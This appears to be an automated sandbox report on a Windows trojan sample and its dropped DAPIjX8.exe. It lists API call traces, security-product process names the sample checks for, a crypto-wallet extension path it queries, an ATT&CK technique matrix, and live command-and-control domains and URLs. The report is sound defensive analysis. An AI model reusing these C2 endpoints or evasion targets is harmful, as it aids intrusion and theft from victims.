                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,9_2_6C6C5C68
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,9_2_6C6CFC04
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_6C6CFCF0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: EnumSystemLocalesA,9_2_6C6CFCC6
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,9_2_6C6C4CBE
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,9_2_6C6CFD57
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,9_2_6C6CFD93
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoA,9_2_6C6D3FD6
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_6C6CF83C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,9_2_6C6C594A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,9_2_6C6CF931
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,9_2_6C6CF9D8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,9_2_6C6CFA33
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,9_2_6C6CE436
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,9_2_6C6CE510
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,9_2_6C6BB122
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,9_2_6C6CF2B0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: EnumSystemLocalesW,9_2_0334E3C9
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,9_2_03359641
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,9_2_033314C4
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_03359A58
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: EnumSystemLocalesW,9_2_03359932
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,9_2_0334E93C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: EnumSystemLocalesW,9_2_033599CD
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: EnumSystemLocalesW,9_2_033598E7
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_03359FB0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,9_2_03359EDD
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_03359DD5
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,9_2_03359CAD
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: EnumSystemLocalesW,9_2_100503A5
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,9_2_100334A0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,9_2_1005B61D
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: EnumSystemLocalesW,9_2_1005B8C3
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: EnumSystemLocalesW,9_2_1005B90E
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,9_2_10050918
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: EnumSystemLocalesW,9_2_1005B9A9
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,9_2_1005BA34
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,9_2_1005BC89
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,9_2_1005BDB1
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,9_2_1005BEB9
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,9_2_1005BF8C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,10_2_6C6C5C68
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,10_2_6C6CFC04
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_6C6CFCF0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: EnumSystemLocalesA,10_2_6C6CFCC6
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,10_2_6C6C4CBE
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,10_2_6C6CFD57
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,10_2_6C6CFD93
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoA,10_2_6C6D3FD6
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,10_2_6C6CF83C
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,10_2_6C6C594A
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,10_2_6C6CF931
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,10_2_6C6CF9D8
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,10_2_6C6CFA33
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,10_2_6C6CE436
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,10_2_6C6CE510
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,10_2_6C6BB122
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,10_2_6C6CF2B0
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                Source: C:\Windows\System32\OpenWith.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_00639CAB GetSystemTimeAsFileTime,__aulldiv,0_2_00639CAB
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeCode function: 9_2_033314C4 RegOpenKeyExA,RegCloseKey,GetTickCount,gethostname,GetUserNameA,GetLastError,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,lstrcpy,lstrlen,OpenSCManagerA,wsprintfA,OpenServiceA,QueryServiceStatus,wsprintfA,lstrlen,GetModuleFileNameA,SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindNextFileA,FindNextFileA,EnumDisplaySettingsA,_strftime,OpenSCManagerA,QueryServiceStatus,OpenSCManagerA,QueryServiceStatus,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,9_2_033314C4
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_006476CC __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_006476CC
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_0053F694 _memset,GetVersionExW,0_2_0053F694
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: DAPIjX8.exeBinary or memory string: acs.exe
                Source: DAPIjX8.exe, 00000009.00000002.3245993542.00000000015D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: DAPIjX8.exeBinary or memory string: kxetray.exe
                Source: DAPIjX8.exeBinary or memory string: vsserv.exe
                Source: DAPIjX8.exeBinary or memory string: avcenter.exe
                Source: DAPIjX8.exeBinary or memory string: cfp.exe
                Source: DAPIjX8.exe, DAPIjX8.exe, 00000009.00000002.3246679220.00000000032FE000.00000040.00000020.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3247531468.0000000010064000.00000002.00001000.00020000.00000000.sdmp, DAPIjX8.exe, 00000009.00000002.3246471111.00000000031D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: KSafeTray.exe
                Source: DAPIjX8.exeBinary or memory string: avp.exe
                Source: pXm5oVO3Go.exe, DAPIjX8.exeBinary or memory string: 360tray.exe
                Source: DAPIjX8.exeBinary or memory string: rtvscan.exe
                Source: DAPIjX8.exeBinary or memory string: TMBMSRV.exe
                Source: DAPIjX8.exeBinary or memory string: ashDisp.exe
                Source: DAPIjX8.exeBinary or memory string: avgwdsvc.exe
                Source: DAPIjX8.exeBinary or memory string: AYAgent.aye
                Source: DAPIjX8.exeBinary or memory string: QUHLPSVC.EXE
                Source: DAPIjX8.exeBinary or memory string: RavMonD.exe
                Source: DAPIjX8.exeBinary or memory string: Mcshield.exe
                Source: DAPIjX8.exeBinary or memory string: K7TSecurity.exe
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 9.2.DAPIjX8.exe.32fec24.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.DAPIjX8.exe.31d9c24.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.DAPIjX8.exe.31d9c24.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.DAPIjX8.exe.32fec24.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3247531468.0000000010064000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3246471111.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3246679220.00000000032FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DAPIjX8.exe PID: 5296, type: MEMORYSTR
                Source: C:\Program Files (x86)\6fjdie\DAPIjX8.exeFile queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 9.2.DAPIjX8.exe.32fec24.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.DAPIjX8.exe.31d9c24.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.DAPIjX8.exe.31d9c24.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.DAPIjX8.exe.32fec24.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.3247531468.0000000010064000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3246471111.00000000031D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3246679220.00000000032FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: DAPIjX8.exe PID: 5296, type: MEMORYSTR
                Source: C:\Users\user\Desktop\pXm5oVO3Go.exeCode function: 0_2_00417CF0 WSAStartup,htons,htons,inet_addr,socket,bind,WSAGetLastError,WSAAsyncSelect,listen,0_2_00417CF0
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                1
                Credential API Hooking
                12
                System Time Discovery
                Remote Services11
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Native API
                1
                Create Account
                1
                Access Token Manipulation
                1
                Deobfuscate/Decode Files or Information
                11
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts2
                Command and Scripting Interpreter
                11
                Windows Service
                11
                Windows Service
                2
                Obfuscated Files or Information
                Security Account Manager3
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Screen Capture
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts12
                Service Execution
                1
                Registry Run Keys / Startup Folder
                13
                Process Injection
                1
                DLL Side-Loading
                NTDS247
                System Information Discovery
                Distributed Component Object Model1
                Credential API Hooking
                15
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                Registry Run Keys / Startup Folder
                2
                Masquerading
                LSA Secrets571
                Security Software Discovery
                SSH11
                Input Capture
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts23
                Virtualization/Sandbox Evasion
                Cached Domain Credentials23
                Virtualization/Sandbox Evasion
                VNC3
                Clipboard Data
                Multiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSync13
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job13
                Process Injection
                Proc Filesystem1
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Indicator Removal
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1499614 Sample: pXm5oVO3Go.exe Startdate: 27/08/2024 Architecture: WINDOWS Score: 100 30 web.ad87h92j.com 2->30 32 mvc.withoutyou5.com 2->32 34 cacer.goldenh0ur.com 2->34 42 Malicious sample detected (through community Yara rule) 2->42 44 Antivirus detection for dropped file 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 7 other signatures 2->48 7 pXm5oVO3Go.exe 4 22 2->7         started        12 DAPIjX8.exe 2->12         started        14 DAPIjX8.exe 2->14         started        16 OpenWith.exe 3 2->16         started        signatures3 process4 dnsIp5 40 web.ad87h92j.com 188.114.96.3, 49714, 49715, 80 CLOUDFLARENETUS European Union 7->40 22 C:\Program Files (x86)\6fjdie\libcef.dll, PE32 7->22 dropped 24 C:\Program Files (x86)\...\VCRUNTIME140.dll, PE32 7->24 dropped 26 C:\Program Files (x86)\6fjdie\MSVCP140.dll, PE32 7->26 dropped 28 3 other malicious files 7->28 dropped 58 Found API chain indicative of debugger detection 7->58 18 DAPIjX8.exe 3 7->18         started        60 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 12->60 62 Hides threads from debuggers 12->62 file6 signatures7 process8 dnsIp9 36 cacer.goldenh0ur.com 104.21.17.45, 443, 49716 CLOUDFLARENETUS United States 18->36 38 mvc.withoutyou5.com 104.26.7.127, 443, 49717, 49718 CLOUDFLARENETUS United States 18->38 50 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 18->50 52 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->52 54 Tries to access browser extension known for cryptocurrency wallets 18->54 56 Hides threads from debuggers 18->56 signatures10

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                pXm5oVO3Go.exe16%ReversingLabsWin32.Trojan.Zenpak
                pXm5oVO3Go.exe17%VirustotalBrowse
                SourceDetectionScannerLabelLink
                C:\Program Files (x86)\6fjdie\t4d.tmp100%AviraDR/FakePic.Gen
                C:\Program Files (x86)\6fjdie\t5d.tmp100%AviraDR/FakePic.Gen
                C:\Program Files (x86)\6fjdie\DAPIjX8.exe0%ReversingLabs
                C:\Program Files (x86)\6fjdie\MSVCP140.dll0%ReversingLabs
                C:\Program Files (x86)\6fjdie\VCRUNTIME140.dll0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                https://curl.haxx.se/docs/http-cookies.html0%URL Reputationsafe
                http://www.openssl.org/support/faq.html0%URL Reputationsafe
                https:///api.php/common/gettask/api.php/common/getdomain.200idleActivityTimePlugingsleep0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com:443/api.php/common/gettask32=C:0%Avira URL Cloudsafe
                https://laosiji.swjoy.com/client/api/3172/qr_code.dohttps://laosiji.swjoy.com/client/api/3524/qr_cod0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/U0%Avira URL Cloudsafe
                https://laosiji.swjoy.com/client/api/3172/qr_code.do0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/it$0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/fmB0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/api.php/common/gettask0%Avira URL Cloudsafe
                https://data.iana.org/time-zones/tz-link.htmlPostScript0%Avira URL Cloudsafe
                https://300.jumpw.com/Activity/cdn/300hero/tojmp/accesstojmp.json0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com:443/api.php/common/gettask0%Avira URL Cloudsafe
                https://passport.jumpw.com/OtherGameUserLogin/CheckGameLogin.jsp?co=10139.https://passport.jumpw.com0%Avira URL Cloudsafe
                https://laosiji.swjoy.com/client/api/3524/qr_code.do0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/text.bmpC:0%Avira URL Cloudsafe
                https://300.jumpw.com/Activity/cdn/300hero/tojmp/testtojmp.json0%Avira URL Cloudsafe
                https://mvc.withoutyou5.com/d0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/t.bmpP0%Avira URL Cloudsafe
                http://api.jumpw.com/Announcement.html?gameid=0%Avira URL Cloudsafe
                https://www.geonames.org/0%Avira URL Cloudsafe
                https://data.iana.org/time-zones/tz-link.html0%Avira URL Cloudsafe
                https://www.geonames.org/Timezone0%Avira URL Cloudsafe
                http://www.astro.com/swisseph.0%Avira URL Cloudsafe
                https://cacer.goldenh0ur.com/api.php/common/getdomain0%Avira URL Cloudsafe
                http://web.ad87h92j.com/4/t.bmpmp0%Avira URL Cloudsafe
                https://support.ubi.com/?GenomeId=954e66a0-be1b-4aa0-9690-fb75201e4e9epidRequired0%Avira URL Cloudsafe
